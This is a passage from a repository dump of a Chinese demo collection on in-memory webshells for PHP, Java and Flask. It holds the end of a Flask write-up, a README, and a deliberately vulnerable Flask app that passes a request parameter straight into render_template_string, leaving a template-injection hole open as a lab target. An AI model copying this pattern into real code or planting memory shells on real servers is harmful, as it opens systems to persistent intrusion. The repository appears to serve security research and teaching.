11 | ![image-20210329220308313](https://github.com/jweny/MemShellDemo/blob/master/MemShellForPython/python%20flask%20%E5%86%85%E5%AD%98%E9%A9%AC.assets/image-20210329220246511.png)
12 | 
13 | 访问植入的shell：
14 | 
15 | ![image-20210329220246511](https://github.com/jweny/MemShellDemo/blob/master/MemShellForPython/python%20flask%20%E5%86%85%E5%AD%98%E9%A9%AC.assets/image-20210329220246511.png)
16 | 
17 | 参考：
18 | 
19 | https://github.com/iceyhexman/flask_memory_shell
20 | 
21 | https://segmentfault.com/a/1190000022175553
22 | 
23 | https://xz.aliyun.com/t/8029


--------------------------------------------------------------------------------
/MemShellForPython/漏洞环境/flaskSstiServer.py:
--------------------------------------------------------------------------------
 1 | from flask import Flask,request
 2 | from flask import render_template_string
 3 | app = Flask(__name__)
 4 | 
 5 | @app.route('/')
 6 | def hello_world():
 7 |     return 'Hello World'
 8 | 
 9 | 
10 | @app.route('/test',methods=['GET', 'POST'])
11 | def test():
12 |     template = '''
13 |         <div class="center-content error">
14 |             <h1>Oops! That page doesn't exist.</h1>
15 |             <h3>%s</h3>
16 |         </div> 
17 |     ''' %(request.values.get('param'))
18 | 
19 |     return render_template_string(template)
20 | 
21 | 
22 | if __name__ == '__main__':
23 |     app.run(port=8000)   


--------------------------------------------------------------------------------
/README.assets/wechat.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/README.assets/wechat.jpeg


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # 内存马Demo
 2 | 
 3 | ## 💡 介绍
 4 | 
 5 | 本项目为各类内存马的Demo合集。
 6 | 
 7 | **本代码仅供学习，仅供学习交流，请勿用于非法和商业用途，否则后果自负。**
 8 | 
 9 | ## ✨ 分析
10 | 
11 | - PHP内存马
12 | 
13 |   https://github.com/jweny/MemShellDemo/tree/master/MemShellForPHP/%E9%80%9A%E8%BF%87php-fpm%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BB
14 | 
15 |   https://github.com/jweny/MemShellDemo/tree/master/MemShellForPHP/%E5%86%85%E5%AD%98%E9%A9%BB%E7%95%99webshell
16 | 
17 | - Java内存马（基于java instrumentation && retransform）
18 | 
19 |   https://www.anquanke.com/post/id/219177
20 | 
21 | - flask内存马
22 | 
23 |   https://mp.weixin.qq.com/s/GRwEBS1UqsWA3MBvukypNg
24 | 
25 | ## 🏘️ 检测工具
26 | 
27 | 检测工具由于商业化原因，暂不开源。
28 | 
29 | 可自行根据检测原理设计方案，如想交流技术可添加WX。
30 | 
31 | ## 🛠️ todo
32 | 
33 | - redefine字节增强型（冰蝎内存马）
34 | - go
35 | - django
36 | - java扩展中间件（目前只有tomcat）


--------------------------------------------------------------------------------